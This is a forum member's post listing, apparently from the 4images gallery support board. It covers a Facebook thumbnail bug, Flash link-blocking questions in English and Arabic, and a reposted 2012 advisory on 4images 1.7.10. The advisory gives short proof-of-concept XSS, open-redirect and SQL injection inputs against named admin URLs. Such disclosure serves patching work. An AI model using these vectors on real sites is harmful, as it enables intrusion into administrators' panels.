Show Posts

This section allows you to view all posts made by this member. Note that you can only see posts made in areas you currently have access to.


Topics - localhost

Pages: [1]
1
Discussion & Troubleshooting / Problem Photos link on Facebook
« on: May 26, 2012, 04:59:19 PM »
Problem Photos link on Facebook
When you put a link Facebook Do not display thumbnails
next to the linkAnd I think that the problem is located in the variable
<{descthumb} / link rel = "image_src" href = "data/thumbnails/8 /" />
Where there is no Hada variable name in the new version {descthumb}

2

new exploit for 4 images version 1.7.10  :( :(
################################################################################################

#  Exploit Title: 4Images Version: 1.7.10 Admin Panel Multiple Vulnerabilities
#  Script Page : http://www.4homepages.de
#  Date: 31-01-2012
#  Author : RandomStorm  - http://www.randomstorm.com
#  Avram Marius Gabriel (d3v1l)
#  Tested on: Windows XP & Mac (IE9 - Firefox 9.0)

################################################################################################
#
# Cross-Site Scripting (XSS)
#
# Vector:  'acc91<script>alert(1)</script>9da1925478
#
# http://4images.com/admin/categories.php?action=addcat&cat_parent_id=1 (XSS)
#
################################################################################################
#
# Open Redirect
#
#
# http://4images.com/admin/index.php?__csrf=931086345abbb83f9a70c87dc4719248&action=login&redirect=http://google.com&loginusername=admin&loginpassword=pass
#
#  <title>4images - Control Panel</title>
#      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
#      <link rel="stylesheet" href="./../admin/cpstyle.css">
#     <meta http-equiv="Refresh" content="0; URL=http://google.com">     
#  <script language="JavaScript">
#
#
################################################################################################
#
# Sql Injection
#
# http://4images.com/admin/categories.php?action=addcat&cat_parent_id=1' (SQL Injection)
#
################################################################################################

3
Hello my friends
Is there a way to disable external links of the  flash files ,
 i tried to fix  the probleme  in the file  swf.html
by adding This code
name = "allowScriptAccess" value = "never"
param name = "allowNetworking" value = "internal"
but without result please help me.

4
سلام عليكم اخواني الكرام
اولا اود اشكركم على هدا السكربت الاكثر من رائع
ثانيا يا ريت لو في طريقة لمنع الروابط في ملفات الفلاش يعني كثير من ملفات الفيديو و الالعاب تكون بها روابط اعادة التوجيه لموقع اخر
وهدا غير جيداا بالفعل
للتوضيح اكثر
 مركز تحميل الصور
جربت ووضعت هدا الامر ضمن الملف
swf.htm
الموجود بملف media
name="allowScriptAccess" value="never"
param name="allowNetworking" value="internal"
لاكن دون فائدة
[/b]

Pages: [1]